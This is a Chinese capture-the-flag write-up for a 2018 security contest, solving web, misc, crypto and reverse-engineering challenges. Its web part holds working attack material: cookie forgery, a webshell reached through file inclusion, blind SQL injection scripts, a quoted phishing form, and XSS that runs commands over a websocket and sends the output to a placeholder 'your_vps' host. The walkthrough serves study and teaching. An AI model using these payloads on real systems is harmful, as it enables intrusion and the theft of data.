前言
周末抽空做了一下2018全国网络空间安全技术大赛,由于题目难度适中,ak了web,做出了绝大部分的misc和crypto
这里特别感谢队友yuriXO对我crypto的极大帮助:)
crypto和misc的题目地址1
链接: https://pan.baidu.com/s/1FSIIbldbBHLNsUFJOaJ8lA 密码: 91v6
WEB
web签到
签到题就不解释了
flag如下1
flag{ylng_ying_yin@}
web1
http://117.34.117.216
访问后跳转到登录页面
http://117.34.117.216/login.php
发现有注册,随意注册一个账号,登录后
发现要以admin的身份访问flag.php
查看源代码,发现还有change_password的功能
同时发现cookie中有username项
猜想可能存在越权问题
进入修改密码页面
发现未做username的check
猜想直接使用了cookie中的username
随机修改cookie中的username为admin
同时修改密码
成功登入,来到管理页面
发现可以获取远程图片
随手测试,发现题目会将远程访问到的页面内容写到本地的图片img目录中
尝试访问
http://127.0.0.1/flag.php
下载图片文件后获得flag
得到flag1
flag{dbf6e52d69973dd16d87d4a8c3816ca9}
web2
访问题目1
http://117.34.116.192/index.php?file=login.html
登录尝试发现是伪登录
随即想到存在文件包含,尝试读取源码1
file=php://filter/read=convert.base64-encode/resource=index.php
提示1
illgal filename!!
发现存在过滤
随手测试了一波目录,发现了.git文件泄露
随后下载到源码
此时打开index.php
发现是经过加密的
这里有两种解密选择1
2http://www.phpjm.cc/
https://github.com/firebroo/screw_decode
前者花钱解密,简单快捷
后者用工具解密,相对于繁琐一些
解密后得到源码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
error_reporting(0);
if(!isset($_GET['file'])||empty($_GET['file'])){
header('Refresh:1,url=index.php?file=login.html');
die;
}
$file = $_GET['file'];
if ((strpos($file,':')!==false)){
header('Refresh:1,url=index.php?file=login.html');
echo "illgal filename!!";
die;
}
include_once($file);
发现只是文件包含
再看upload.php1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
function Administrator($value){
if(empty($_COOKIE['in_adminid']) || empty($_COOKIE['in_adminexpire']) || $_COOKIE['in_adminexpire']!==md5($_COOKIE['in_adminid'].$_COOKIE['in_adminname'].$_COOKIE['in_adminpassword'].$_COOKIE['in_permission'])){
return False;
}
setcookie("in_adminexpire",$_COOKIE['in_adminexpire'],time()+1800);
if(!empty($_COOKIE['in_permission'])){
$array=explode(",",$_COOKIE['in_permission']);
$adminlogined=false;
for($i=0;$i<count($array);$i++){
if($array[$i]==$value){$adminlogined=true;}
}
if(!$adminlogined){
return False;
}
}else{
return False;
}
return true;
}
if (Administrator(2)){
if(isset($_FILES['file'])){
$filename = './img/img'.rand().'.jpg';
move_uploaded_file($_FILES["file"]["tmp_name"],$filename);
header('Refresh:3,url=index.php?file=upload.php');
echo "Upload $filename Success!";
die;
}
}else{
header('Refresh:3,url=index.php?file=login.html');
echo "Who are you!";
die;
}
发现可以文件包含,但是要绕过前面的1
if(empty($_COOKIE['in_adminid']) || empty($_COOKIE['in_adminexpire']) || $_COOKIE['in_adminexpire']!==md5($_COOKIE['in_adminid'].$_COOKIE['in_adminname'].$_COOKIE['in_adminpassword'].$_COOKIE['in_permission']))
随即构造脚本1
2
3
4
5
6
7
8
9
10
11import hashlib
def md5(a):
b = hashlib.md5(a).hexdigest()
return b
in_adminid='1'
in_adminname='admin'
in_adminpassword='admin'
in_permission='2'
in_adminexpire=md5(in_adminid+in_adminname+in_adminpassword+in_permission)
print in_adminexpire
利用cookieedit更改cookie,即可来到上传页面
上传一个带shell的jpg图片
得到文件位置1
Upload ./img/img9545545.jpg Success!
然后利用文件包含1
http://117.34.116.192/index.php?file=./img/img9545545.jpg
菜刀连接上
下载f14g.php
发现依旧是加密过的,还是用上述方法解密
即可得到flag1
2
3
$flag = "";//flag{7cb3d823105433606ccac8fb75aed67c}
web3
http://45.76.49.10:8001
挺有意思的一题,题目应该来源一个真实事件1
2从钓鱼样本到某大厂存储型XSS
https://xz.aliyun.com/t/2322
用PC点开链接会直接跳转到正版的QQ空间
所以这里需要抓包,不难发现跳转到1
http://45.76.49.10:8001/0b10813e85c20b58a023440d9f58d7e2
然后发现内容(过多,给出部分)1
2document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("EzOR925j1QH2xcQc8Tr9x4GfY2UQ/pt8qa6HxeqOo2WBlyxX36pUO4BZcYkzAbOBWHIVSQiE5fH+LMw4MB/kAFyW7hlMZEWJSoJ7agQOOE3G8GWZuKepUs7z4bia/iXPIPicedfmKpk7VIC+axY+HKCwxCCN9jTJo5kC9d8KTGR/xLgz1a1/7I1cBFdwcuuYPtlHcWjDagXWwN0z25MJgq4ZDViT+x+YkilDwwwzOvqesH/LleYn9PMnE00QvrijCo99j/HAvmMPEVJGDADMt+zowRvcQHeehw/ATQ8/K0vOaqqxf4P1uZKDNOnFDTlt6ijtyuGFTrVHQfru3pErTsEoHOrjHj6sHyBA0xZEC1j3wVM4kW1OKZWYBhRNqHUvcz6Tc7tdjwmkqcaEW71NTXxBF4D8zjJoe8qJeGXvo8qSpWJV/4tYLHI3x90dNV9T53CqeyNYmYE995ozzaN8Wwjqt+YthltVTfqBTkE43HX64V0F3Itqvx0QRtzKWjdxwtc5IibTqjuL0JDlrsHLzOIv51qGH9JvgqrE5Y9jZhQoICCUIlgbyKoYuQJvN8Z2yArywMsY4iiU1jG5lI+BvaYS2BK6INwtRdLKYlDn80yKkq3XPFRsloM1KfxS9DQ/a5euUOf/LB91m72PG4p5GRH+kl/fW9OAdJWoXeA4tJpKntxrGonGfS4QAk8ne5JrHCJHqAKHVuyEqeYhHimkhB9bUtDaZJBG8kDwKaiT7cjCHaxJouLo9S5lVGPIUlIQNusMaLAvC6SaIDk4iY50uXdR2mVBouB+g+/pCbK5oTYvxnqrljqti9McqPNGk5AeLPKZzH
.....
是加密后的内容
在密文最后可以发现解密函数1
2
3
4
5document.title = '\u624b\u673a\u7edf\u4e00\u767b\u5f55';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}
function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}
function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}
不难看出,作者自己写了rc4算法和base64加解密
而密文流程为:
base64解密->rc4解密->url解码
我这里直接选择控制台解密
利用console.log和出题人定义好的解密函数,容易直接得到明文代码,由于代码篇幅过长,想看这部分伪造钓鱼代码的,可以看之前文章提及的先知上的一篇文章,我这里只给出部分重要js代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59<script>
var key = "MiaoMiao";
var times = 0;
function error(msg) {
$("#error_tips").css({
display: 'block'
});
$('#error_message').html(msg);
err = true;
}
$('form input').focus(function() {
$("#error_tips").css({
display: 'none'
});
err = false;
});
$("#error_tips").on('click',
function() {
$(this).hide();
});
$("#go").on('click',
function() {
var $this = $(this);
err = false;
var p = $("#p").val();
var u = $("#u").val();
u == '' && error('您还没有输入帐号!');
if (err) return false;
p == '' && error("您还没有输入密码!");
if (err) return false;
/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if (err) return false;
var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。');
if (err) {
$("#p").val('');
return false;
}
if (!err){
$.ajax({
url:'/f701fee85540b78d08cb276d14953d58',
type:'POST',
dataType:'json',
data: "data="+encodeURIComponent(encryptByDES($('#loginform').serialize(),key)),
error:function(er){
window.location.href='https://qzone.qq.com';
}
})
}
})
function encryptByDES(message, key) {
var keyHex = CryptoJS.enc.Utf8.parse(key);
var encrypted = CryptoJS.DES.encrypt(message, keyHex, {
mode: CryptoJS.mode.ECB,
padding: CryptoJS.pad.Pkcs7
});
return encrypted.ciphertext.toString(CryptoJS.enc.Base64);
}
</script>
我们不难看到,黑客获取到用户登录的账号密码后,进行了序列化,然后利用DES加密后post到了后端/f701fee85540b78d08cb276d14953d58
其中DES的密钥为MiaoMiao
现在容易得到思路:
由于该网站是一个钓鱼网站,那么势必会存储用户登录的账号密码
那么既然要存储,可能就会涉及Sql注入问题。既然是钓鱼网站的sql操作
我相信不会有太多的过滤吧(毕竟我相信钓鱼的人不会这么XD)
所以我的第一反应就是insert注入,测试后可以发现,无论post什么数据
网页均无反馈,看起来就是sleep盲注了
于是我构造出测试脚本(注:这里需要注意传输数据得用key加密)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19from pyDes import *
import base64
import requests
import string
url = "http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58"
payload ="1' and if((ascii(substr((database()),1,1))>-1),sleep(10),1) or '"
pay = "ip=0.0.0.0&hrUW3PG7mp3RLd3dJu=12345678900&LxMzAX2jog9Bpjs07jP=%s"%payload
k = des("MiaoMiao", ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
d = base64.b64encode(k.encrypt(pay))
data = {
"data":d
}
print pay
print data
try:
s =requests.post(url=url,data=data,timeout=5)
print s.content
except:
print "sleep 10s ok!"
发现可以成功sleep,于是我立刻写出了注入脚本1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23from pyDes import *
import base64
import requests
import string
url = "http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58"
flag = ""
for i in range(1,50):
print i
for j in '1234567890abcdef{}':
j = ord(j)
payload = "1' and if((ascii(substr((select password from admin limit 0,1),%s,1))=%s),sleep(3),1) or '"%(i,j)
pay = "ip=0.0.0.0&hrUW3PG7mp3RLd3dJu=%s&LxMzAX2jog9Bpjs07jP=123456789" % (payload)
k = des("MiaoMiao", ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
d = base64.b64encode(k.encrypt(pay))
data = {
"data": d
}
try:
s = requests.post(url=url, data=data,timeout=3)
except:
flag += chr(j)
print flag
break
最后可以得到flag1
flag{73ad1744f38b68ece51076c7ac77621b}
web4
http://117.34.112.247:8001
题目的背景为xss->rce
同时给出了部分代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28type msg struct {
Cmd string `json:"cmd"`
}
func main() {
app := sweetygo.New("./", nil)
app.GET("/ws", ws)
app.RunServer(":8002")
}
func ws(ctx *sweetygo.Context) {
conn, _ := websocket.Upgrade(ctx.Resp, ctx.Req, ctx.Resp.Header(), 1024, 1024)
for {
m := msg{}
err := conn.ReadJSON(&m)
if err != nil {
fmt.Println("Error reading json.", err)
break
}
res := exec(m.Cmd)
fmt.Println(res)
if err = conn.WriteJSON(res); err != nil {
fmt.Println(err)
break
}
}
}
不难看出作者使用了go web框架sweetygo
帮作者推广一波1
github.com/AmyangXYZ/sweetygo
这里看应该不存在漏洞的,然后就容易联想到醒目题目描述1
2“grollia的websocket真好用,一句话 conn, _ := websocket.Upgrade(ctx.Resp, ctx.Req, ctx.Resp.Header(), 1024, 1024)就建好了,我也可以搭个IGo NoteBook啦!”
—— 刚学Golang的小明
这里容易联想到websocket的问题
我们看到代码1
2
3
4
5func main() {
app := sweetygo.New("./", nil)
app.GET("/ws", ws)
app.RunServer(":8002")
}
首先探测了一下,发现8002端口并没有对外网开放
我们只能通过内部访问,而唯一的方式就是xss
而我们知道js可以连接websocket
同时注意到1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18func ws(ctx *sweetygo.Context) {
conn, _ := websocket.Upgrade(ctx.Resp, ctx.Req, ctx.Resp.Header(), 1024, 1024)
for {
m := msg{}
err := conn.ReadJSON(&m)
if err != nil {
fmt.Println("Error reading json.", err)
break
}
res := exec(m.Cmd)
fmt.Println(res)
if err = conn.WriteJSON(res); err != nil {
fmt.Println(err)
break
}
}
}
这里存在命令执行(但是出题人为了安全,只允许执行ls和cat)
可以看到,如果我们连接上websocket,传输msg即可造成rce
所以现在的思路比较清晰了
1.构造xss,利用js连接websocket
2.连接后发送RCE命令(ls)
3.将数据打出到自己的vps
查阅资料可以发现1
2
3onmessage:一个用于消息事件的事件监听器,这一事件当有消息到达的时候该事件会触发。这个Listener会被传入一个名为"message"的 MessageEvent 对象。
onopen:一个用于连接打开事件的事件监听器。当readyState的值变为 OPEN 的时候会触发该事件。该事件表明这个连接已经准备好接受和发送数据。这个监听器会接受一个名为"open"的事件对象。
我们先写出xss进行探测,看是否可以成功连接1
2
3
4
5
6
7
8<script>
var ws = new WebSocket("ws://127.0.0.1:8002/ws");
ws.onopen = function(){
$.ajax({
url: "http://your_vps/success"
});
};
</script>
不一会儿就发现收到了success数据,证明连接成功
于是我们构造出rce的js1
2
3
4
5
6
7
8
9
10
11<script>
var ws = new WebSocket("ws://127.0.0.1:8002/ws");
ws.onopen = function(){
var b = {"cmd":"ls"};
ws.send(JSON.stringify(b));
};
ws.onmessage = function(evt){
$.ajax({
url: "http://your_vps/?"+evt.data
});
}</script>
收到回显
读取flag
后来了解到此题的背景同样为真实案例:
IPython Notebook( CVE-2014-3429 )
膜一发作者~
MISC
misc1
题目打开后得到一个图片
发现ffd9后有压缩包
提取出来后发现是伪加密
利用binwalk直接提取
获得文件stego.txt
第一反应即base64隐写1
https://www.tr0y.wang/2017/06/14/Base64steg/
随即写脚本1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17# -*- coding: cp936 -*-
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
with open('stego.txt', 'rb') as f:
bin_str = ''
for line in f.readlines():
stegb64 = ''.join(line.split())
rowb64 = ''.join(stegb64.decode('base64').encode('base64').split())
offset = abs(b64chars.index(stegb64.replace('=','')[-1])-b64chars.index(rowb64.replace('=','')[-1]))
equalnum = stegb64.count('=') #no equalnum no offset
if equalnum:
bin_str += bin(offset)[2:].zfill(equalnum * 2)
print ''.join([chr(int(bin_str[i:i + 8], 2)) for i in xrange(0, len(bin_str), 8)]) #8位一组
运行即可获得flag1
Flag{Ba5e_64OFive}
misc2
这题做的我心态歇逼了
首先是题目描述1
我觉得,这题可以在windows环境下解。
windows下解的mp3题
一般misc无非是隐写,windows下的隐写,容易想到ntfs
但是心态歇逼的第一点:
用其他压缩软件解压题目给的压缩包,都得不到ntfs隐写。。。
唯独winrar解压可以得到,用工具查看
发现有flag.doc文件
导出后查看文件内容
发现有处有奇怪的空白
我们改变一下字体颜色为红色
但是显然是第二段的flag:_from_your_efforts}
还有一段在哪里呢?
这就是第二个歇逼的点。。。
用winhex或者改成txt格式查看文件末尾
可以发现
另一段flag1
f l a g { A l l _ s u c c e s s _ c o m e s
最后得到flag1
flag{All_success_comes_from_your_efforts}
misc3
题目有些脑洞
看到题目提示1
ames发现公司员工通过数据包向外隐匿地发送信息,并截获了这段时间的流量包,请帮助他恢复流量中隐匿传输的信息,并以flag{*}的形式提交。
重点在于隐匿的,查看了一遍tcp和http流量,并未发现什么奇特的点
最后在icmp协议中发现了问题
容易看到每个icmp协议中的2个字符都在变化,其余均不变,于是脑洞大开,拼接为一起,成功得到flag1
flag{RyHgbCf5OhFEiyJnlt9c8ASP}
Crypto
crypto1
题目描述1
2在RSA算法中,我们知道公钥加密指数e要与φ(n)互素。但是如果e与φ(n)不互素,我们应该怎么办呢?
已知条件见文本,解出明文,递交FLAG。
观察到e为200=8*25
此时我们可以用25的逆元去解,然后开8次方即可
脚本如下1
2
3
4
5
6
7
8
9import gmpy2
c=7797067792814175554801975939092864905908878472965854967525218347636721153564161093453344819975650594936628697646242713415817737235328825333281389820202851500260665233910426103904874575463134970160306453553794787674331367563821223358610113031883172742577264334021835304931484604571485957116313097395143177603380107508691261081725629713443494783479897404175199621026515502716868988672289887933681890547568860707175288422275073767747544353536862473367590288531216644146154729962448906402712219657000812226637887827912541098992158458173920228864293993030475885461755767069329678218760943185942331149777258713727459739405
p=111052706592359766492182549474994387389169491981939276489132990221393430874991652628482505832745103981784837665110819809096264457329836670397000634684595709283710756727662219358743235400779394350023790569023369287367240988429777113514012101219956479046699448481988253039282406274512111898037689623723478951613
q=146182161315365079136034892629243958871460254472263352847680359868694597466935352294806409849433942550149005978761759458977642785950171998444382137410141550212657953776734166481126376675282041461924529145282451064083351825934453414726557476469773468589060088164379979035597652907191236468744400214917268039573
e=25
n=p*q
d =gmpy2.invert(e,(p-1)*(q-1))
flag8 = pow(c,d,n)
print hex(gmpy2.iroot(flag8,8)[0])
即可得到1
0x4354467b4c6966655f49535f415f4265617574797d
即1
CTF{Life_IS_A_Beauty}
crypto2
题目实际上ecc算法
参考链接1
https://hgarrereyn.gitbooks.io/th3g3ntl3man-ctf-writeups/2017/picoCTF_2017/problems/cryptography/ECC2/ECC2.html
使用上述链接中的代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22from sage.all import *
M = 93556643250795678718734474880013829509320385402690660619699653921022012489089
A = 66001598144012865876674115570268990806314506711104521036747533612798434904785
B = 25255205054024371783896605039267101837972419055969636393425590261926131199030
P = (56027910981442853390816693056740903416379421186644480759538594137486160388926, 65533262933617146434438829354623658858649726233622196512439589744498050226926)
Q = (82470715998045253133931379369477906093551619202698188387811754055611146940802, 73706972132070004469528192666337156782673206740372495041722107956327401385152)
F = FiniteField(M)
E = EllipticCurve(F,[A,B])
P = E.point(P)
Q = E.point(Q)
factors, exponents = zip(*factor(E.order()))
primes = [factors[i] ^ exponents[i] for i in range(len(factors))][:-2]
dlogs = []
for fac in primes:
t = int(P.order()) / int(fac)
dlog = discrete_log(t*Q,t*P,operation="+")
dlogs += [dlog]
print("factor: "+str(fac)+", Discrete Log: "+str(dlog)) #calculates discrete logarithm for each prime order
l = crt(dlogs,primes)
print(l)
可以计算k1
2
3
4
5
6
7
8
9
10
11factor: 4, Discrete Log: 2
factor: 3, Discrete Log: 2
factor: 5, Discrete Log: 4
factor: 7, Discrete Log: 1
factor: 137, Discrete Log: 70
factor: 593, Discrete Log: 459
factor: 24337, Discrete Log: 4079
factor: 25589, Discrete Log: 22677
factor: 3637793, Discrete Log: 192569
factor: 5733569, Discrete Log: 123222
241442528183133391090263659954
观察到题目的加密流程1
2
3
4
5
6def encrypt(B,flag):
M=[]
(x,y)=B
for i in flag:
M.append(str((int(i)*x)%p))
return M
我们只要求逆元乘回去即可1
2
3
4
5
6
7def decrypt(B,cipher):
M = []
(x, y) = B
d = gmpy2.invert(x,p)
for i in cipher:
M.append(str((int(i) * d) % p))
return M
最后完整解题代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59# -*- coding: cp936 -*-
import gmpy2
p=93556643250795678718734474880013829509320385402690660619699653921022012489089
a=66001598144012865876674115570268990806314506711104521036747533612798434904785
b=25255205054024371783896605039267101837972419055969636393425590261926131199030
P=(56027910981442853390816693056740903416379421186644480759538594137486160388926, 65533262933617146434438829354623658858649726233622196512439589744498050226926)
def add(p,a,b,P,Q):
if P==(0,0):
return Q
if Q==(0,0):
return P
if P!=(0,0) and Q!=(0,0):
(Px,Py),(Qx,Qy)=P,Q
if P!=Q:
s=(Qy - Py) * gmpy2.invert(Qx - Px, p) % p
else:
s=(3 * Px ** 2 + a) * gmpy2.invert(2 * Py, p) % p
Rx=(s**2-Px-Qx)%p
Ry=(s*Px-s*Rx-Py)%p
return int(Rx),int(Ry)
def bits(n):
while n:
yield n & 1
n >>=1
def double_and_add(n,p,a,b,P):
Q=P
result=(0,0)
for bit in bits(n):
if bit==1:
result=add(p,a,b,result,Q)
Q=add(p,a,b,Q,Q)
return result
def encrypt(B,flag):
M=[]
(x,y)=B
for i in flag:
M.append(str((int(i)*x)%p))
return M
def decrypt(B,cipher):
M = []
(x, y) = B
d = gmpy2.invert(x,p)
for i in cipher:
M.append(str((int(i) * d) % p))
return M
c=['59606574942045237892160565660789485179761474793536568061197611839605420346341', '47875019928315975935470451251861629803812269197911544058574875780767887781883', '47875019928315975935470451251861629803812269197911544058574875780767887781883', '87395068884892630805602977284140888323072523242568617217106051341924998180285', '46630423195878630891974017244302408005523563020190564609208709685671882231257', '75663513871163368848912862875213032947123317646943593214483315283087465615827', '85854675293416868827320102885172653026510557702538106366457650697150744603084', '65472352448909868870505622865253412867736077591349080062508979869024186628570', '53740797435180606913815508456325557491786871995724056059886243810186654064112', '29033090675284737956938845630910624941599754626753028605274605597415583384570', '46630423195878630891974017244302408005523563020190564609208709685671882231257', '75663513871163368848912862875213032947123317646943593214483315283087465615827', '85854675293416868827320102885172653026510557702538106366457650697150744603084', '65472352448909868870505622865253412867736077591349080062508979869024186628570', '53740797435180606913815508456325557491786871995724056059886243810186654064112', '79988897786552237848975045680708725338535954904725594365146282667731978320855', '46630423195878630891974017244302408005523563020190564609208709685671882231257', '87395068884892630805602977284140888323072523242568617217106051341924998180285', '47875019928315975935470451251861629803812269197911544058574875780767887781883', '59606574942045237892160565660789485179761474793536568061197611839605420346341', '68553139631861392827071371663189883460860008671410101763805781158572693782972']
C1=(86892541043117403764803129862679079014029734149331061618933412161852971278663, 76398582431519045045640039001896036904727467709248934373737249884161020619730)
k=241442528183133391090263659954
kc1 = double_and_add(k,p,a,b,C1)
flag = decrypt(kc1,c)
res = ""
for i in flag:
res+=chr(int(i))
print res
运行后得到flag1
flag{GOOD LUCK, LUCKY DOG!}
crypto3
nc 117.34.112.241 1279
此题是一道Padding oracle attack的题目
详细介绍可以参照我的这篇文章1
http://skysec.top/2017/12/13/padding-oracle%E5%92%8Ccbc%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/
这里我直接给出利用脚本了1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44#!/usr/bin/env python
# coding=utf-8
from pwn import *
result = ''
result1=''
encode = '\x03\xc1\x1c\x98\x0e\x8a\x75\xf4\x6b\x04\x83\xeb\x3b\x58\xa1\x3a\x31\xe8\x26\x08\xe2\x44\x5e\xa1\x05\xd9\xc7\x86\x8b\xd9\x75\x9a'
encode1 = encode[0:16]
encode2 = encode[16:32]
encode3 = '123456789ABCDEFG'
p = remote('117.34.112.241',1279)
p.recvuntil('crack violently!\n')
def dd(datab):
p.send('2\n')
p.recvuntil("bytes ciphertext\n")
p.sendline(encode1)
p.recvuntil('IV\n')
p.sendline(datab)
zz = p.recvline()
print zz
if "good" in zz:
print 'success'
print datab
return 1
else:
print 'false'
jj = ''
xx = ''
for j in xrange(1,17):
for z in result1:
xx += chr(ord(z)^j)
for i in xrange(0,256):
print i
ss = (15-len(result1)) * chr(0)
ss = ss +chr(i)+xx
if dd(ss):
wrp= chr(i^j^ord(encode3[16-j]))
result += wrp
jj = chr(ord(wrp))+jj
result1 = chr(i^j) + result1
print jj
xx = ''
break
用iv和encode1得到第一段明文
用encode1和encode2得到第二段明文
crypto4
题目描述1
在Alice用帐户名和密码登录一个用RSA加密通信的网站的过程中,不小心将密码的最后一位字符的大小写弄错了,于是重新输入,这一过程恰好被攻击者K监听到,并截获了这两条密文。那么攻击者就能很容易破解出Alice的密码,求出这个密码,提交FLAG。
可以看到加密的明文消息只有1位不同,相差32,查到一篇相关文章
参考链接1
https://github.com/ZoEplA/Team233/blob/0bb364f2aef8775230c9552d75465ef6a6aa1fb5/2018/wp/redhet/Team233%20writeup.md
效仿其中的代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25# solve.sage
from hashlib import sha256
def related_message_attack(c1, c2, diff, e, n):
PRx.<x> = PolynomialRing(Zmod(n))
g1 = x^e - c1
g2 = (x+diff)^e - c2
def gcd(g1, g2):
while g2:
g1, g2 = g2, g1 % g2
return g1.monic()
return -gcd(g1, g2)[0]
n = 27262030738190162906068533309218248319312037416856794814532459866130196673561833084739048171769479893806671499522643803412108279907223895517897969906253626028270289028646596897429641138913001561947557784840311014399973312098056896539904624036584153785225626096007313018814076860235378686567457599895712604364100507424939342862464483596795761725357279364545154915110900098124905389351969357103586063992040096368146580315262263546850581515833590884397726108478477798668261762306189036525841356592859315437201733146083995028221597538824801113980100295046731791678895520928441645173205511865657977068061078456941189550383
e = 3
c2 = 80256065280425989347153660555632253204654757632704797390559450985825600409910703812294413750536361555897348650491697548574007864446117693097103136799284683292648287334023253488891301144881769557674366138889636475162525325855368132832237345279798028008137655682278413635753791609965810603989005785747744993045461207072415730041608172272077090225741385971
c1 = 80256065280425989347153660555632253204654757632704797390559450985825600409910703812294413750536361555897348650491699334745453065435184774282609871793525447798655880850590288431173204818294305809864531293135689257716648980215360552397800418527073621708108066406898267720300730094465977262440649283179655484278496374936325875186126245693549228697550672467
diff = 32
m = related_message_attack(c2, c1, diff, e, n)
flag = ('%x' % m).decode('hex')
print flag
得到flag1
my password is: I_Lov5_RSA_Rel6te7_me8sagE_aTTacK
Re
re1
由于re1实际上也是密码题。。所以我也做了一下
将题目给的pyc反编译一下,得到代码如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from hashlib import md5
import base64
from time import time
from datetime import datetime
import sys
def encodestr(string):
UC_KEY = '123456789'
key = md5(UC_KEY.encode('utf-8')).hexdigest()
keya = md5(key[0:16].encode('utf-8')).hexdigest()
keyb = md5(key[16:32].encode('utf-8')).hexdigest()
ckey_length = 4
keyc = md5(string.encode('utf-8')).hexdigest()[-ckey_length:]
cryptkey = md5((keya + keyc).encode('utf-8')).hexdigest()
key_length = len(cryptkey)
expiry = 20
string = '%10d' % expiry + md5((string + keyb).encode('utf-8')).hexdigest()[0:16] + string
box = range(256)
rndkey = [
0] * 256
for i in range(256):
rndkey[i] = ord(cryptkey[i % key_length])
string_length = len(string)
result = ''
j = 0
for i in range(256):
j = (j + box[i] + rndkey[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
a = 0
j = 0
for i in range(string_length):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(ord(string[i]) ^ box[(box[a] + box[j]) % 256])
return result
if __name__ == '__main__':
str1 = raw_input('please enter the flag:')
res = encodestr(str1)
lenn = len(res)
d = [
128,
220,
109,
113,
242,
153,
181,
203,
21,
122,
2,
101,
42,
55,
56,
19,
190,
181,
99,
47,
217,
109,
129,
221,
9,
65,
235,
48,
197,
103,
123,
86,
25,
112,
172,
175,
42,
168,
232,
81,
224,
170,
16,
210,
98,
229,
15,
30,
134]
for i in range(lenn):
if ord(res[i]) == d[i] or i == lenn - 1:
print 'you get it'
print 'wrong'
break
不难看出,和rc4密钥相关的明文输入只有4位,那么我们可以选择爆破这4位
而rc4的算法未:
keystream xor mes = cipher
所以我们只需要爆破4位未知密钥,然后生成密钥流和密文异或即可
脚本如下1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from hashlib import md5
def encodestr(string,keyc):
UC_KEY = '123456789'
key = md5(UC_KEY.encode('utf-8')).hexdigest()
keya = md5(key[0:16].encode('utf-8')).hexdigest()
keyb = md5(key[16:32].encode('utf-8')).hexdigest()
cryptkey = md5((keya + keyc).encode('utf-8')).hexdigest()
key_length = len(cryptkey)
box = range(256)
rndkey = [0] * 256
for i in range(256):
rndkey[i] = ord(cryptkey[i % key_length])
string_length = 49
result = ''
j = 0
for i in range(256):
